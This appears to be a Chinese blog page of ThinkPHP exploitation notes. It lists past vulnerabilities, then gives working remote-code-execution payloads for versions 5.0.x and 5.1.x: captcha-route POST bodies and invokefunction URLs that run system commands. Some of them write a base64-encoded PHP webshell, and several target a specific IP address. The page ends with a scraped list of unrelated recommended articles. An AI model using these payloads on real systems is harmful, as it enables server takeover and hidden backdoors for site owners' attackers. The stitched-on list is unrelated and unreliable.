➢ Thinkphp介绍
ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,支持
windows/Unix/Linux等服务器环境。

➢ Thinkphp应用
很多cms就是基于thinkphp二次开发的,所以thinkphp出问题的话,会影响很多基于thinkphp开发的网站。
➢历史漏洞
ThinkPHP3.2.3_缓存函数设计缺陷可导致Getshell
ThinkPHP5_SQL注入漏洞&&敏感信息泄露
ThinkPHP3.2.3_最新版update注入漏洞
ThinkPHP5.0.10缓存函数设计缺陷可导致Getshell
ThinkPHP3.2.X_find_select_delete注入
ThinkPHP框架5.0.X_sql注入漏洞分析
ThinkPHP3.X_order_by注入漏洞
ThinkPHP5.X_order_by注入漏洞
ThinkPHP5.X_远程代码执行

➢ Thinkphp特征


➢漏洞检测
https://github.com/Lucifer1993/TPscan
➢漏洞简介( 5.0.23)
其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可
以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

➢漏洞利用( (命令执行) )
POST /index.php?s=captcha
Data:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
➢漏洞利用( (命令执行) )
POST /index.php?s=captcha
Data:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=
echo -n YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg== |
base64 -d > shell9.php

➢漏洞简介( 5.0.22/5.1.29)
其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下
(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

➢漏洞利用(代码执行)
http://47.104.255.11:9001/index.php?s=/Index/\think\app/invokefunction&function=
call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
➢漏洞利用(命令执行)
http://47.104.255.11:9001/index.php?s=/Index/\think\app/invokefunction&function=
call_user_func_array&vars[0]=system&vars[1][]=whoami
➢漏洞利用(写 webshell)
http://47.104.255.11:9001/index.php?s=/Index/\think\app/invokefunction&function=
call_user_func_array&vars[0]=system&vars[1][]=echo -n
YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg== | base64 -d > shell9.php

Thinkphp漏洞相关推荐

  1. php %3c0x1a%3e是什么_利用ThinkPHP漏洞扫描攻击

    利用ThinkPHP漏洞扫描攻击 115.238.244.112   119.3.90.139    94.191.10.105 POST /index.php/?s=captcha HTTP/1.1 ...

  2. thinkphp漏洞复现

    所有文章,仅供安全研究与学习之用,后果自负! thinkphp漏洞 前言 一.thinkphp-2x-rce 代码执行 0x01 漏洞描述 0x02 影响版本 0x03 漏洞利用 0x04 漏洞修复 ...

  3. ThinkPHP漏洞总结复现

    ThinkPHP漏洞总结 简介 版本 Thinkphp 2.x 任意代码执行漏洞 漏洞原理 复现过程 修复意见 Thinkphp5-5.0.22/5.1.29远程执行代码漏洞 漏洞原理 影响范围 复现 ...

  4. ThinkPHP漏洞总结(利用)

    ThinkPHP介绍 ThinkPHP是一个快速.兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从S ...

  5. thinkphp漏洞_漏洞分析之thinkPHP反序列化:这就是黑客的世界吗

    前言 作为一个Web菜鸡,我之前和师傅们参加了红帽杯,奈何只有0输出,当时只知道是thinkphp5.2的反序列化漏洞,但是感觉时间不够了,也就没有继续做下去.只有赛后来查漏补缺了,也借着tp5.2这 ...

  6. thinkphp漏洞_【组件攻击链】ThinkCMF 高危漏洞分析与利用

    一.组件介绍 1.1 基本信息 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架.ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形 ...

  7. Thinkphp漏洞详解合集

    文章目录 Thinkphp6.0.12LTS反序列化漏洞 环境 漏洞分析 thinkphp lang命令执行 环境 影响版本 漏洞分析 漏洞复现 CNVD-2018-24942(t5RCE) 环境 影 ...

  8. [Vulhub] ThinkPHP漏洞合集

    文章目录 ThinkPHP 2.x 任意代码执行漏洞 0x00 漏洞描述 0x01 影响版本 0x02 靶场环境 0x03 漏洞分析 0x04 漏洞复现 0x05 getshell Thinkphp5 ...

  9. 渗透测试之路:ThinkPHP漏洞复现

    1)简介 ThinkPHP是一个免费开源的,快速的,简单的面向对象的国产轻量级PHP开发框架. ThinkPHP遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业级应用开而诞生的,具有 ...

  10. ThinkPHP漏洞利用

    漏洞标志 影响版本 ThinkPHP 5.0.x ~ 5.0.23 ThinkPHP 5.1.x ~ 5.1.31 漏洞利用 先查看版本号.在网址上随意输入一个不存在的模块 地址: 可以看到,thin ...

最新文章

  1. Template Metaprogramming
  2. web网络图片查看器Android
  3. 解决linux中tmp目录下的文件被清理的问题
  4. java爬虫登录_Java爬虫中怎么爬取需要登录的网站
  5. python汉化 草蟒_草蟒首页、文档和下载 - Python 汉化版
  6. 利用 adb 对手机进行屏幕分辨率设置
  7. java实现心型代码
  8. Laravel 5.5 Eloquent ORM - 快速入门
  9. 刚刚!核电老将俞培根晋升东方电气集团董事长
  10. 用户留存分析学习整理
  11. TensorFlow学习笔记——《TensorFlow技术解析与实战》
  12. 关于用python实现Windows笔记本自动切换强信号WiFi功能
  13. 记录一次 Liferay 7.X 中弹出窗口的简单使用
  14. 千锋逆战班学习第二十五天
  15. 无Internet访问权限却可以上网
  16. [亲测可行]Ubuntu16.04+opencv3.4+opencv_contrib+cuda9.0安装
  17. Photoshop界面字体太小解决方案
  18. 数据结构之排序-希尔排序
  19. html编写田字格,canvas画田字格与米字格
  20. 你的简历真的做的好吗?一起来看看软件测试简历的常见误区

热门文章

  1. 解决FutureWarning: The default method ‘yw‘ can produce PACF values outside of the [-1,1] interval.
  2. 旋转(一):旋转矩阵推导
  3. 塑造客户体验未来的趋势
  4. 方法、操作、算法和多态性术语的不同意义
  5. eclipse配置spark开发环境
  6. 【Matlab水果识别】自助水果超市【含GUI源码 594期】
  7. 机器学习: 如何防止过拟合
  8. C语言实现从键盘输入年月日,输出该月的天数
  9. mongodb aggregate $unwind
  10. Eslint跳过对某行、某段代码的检查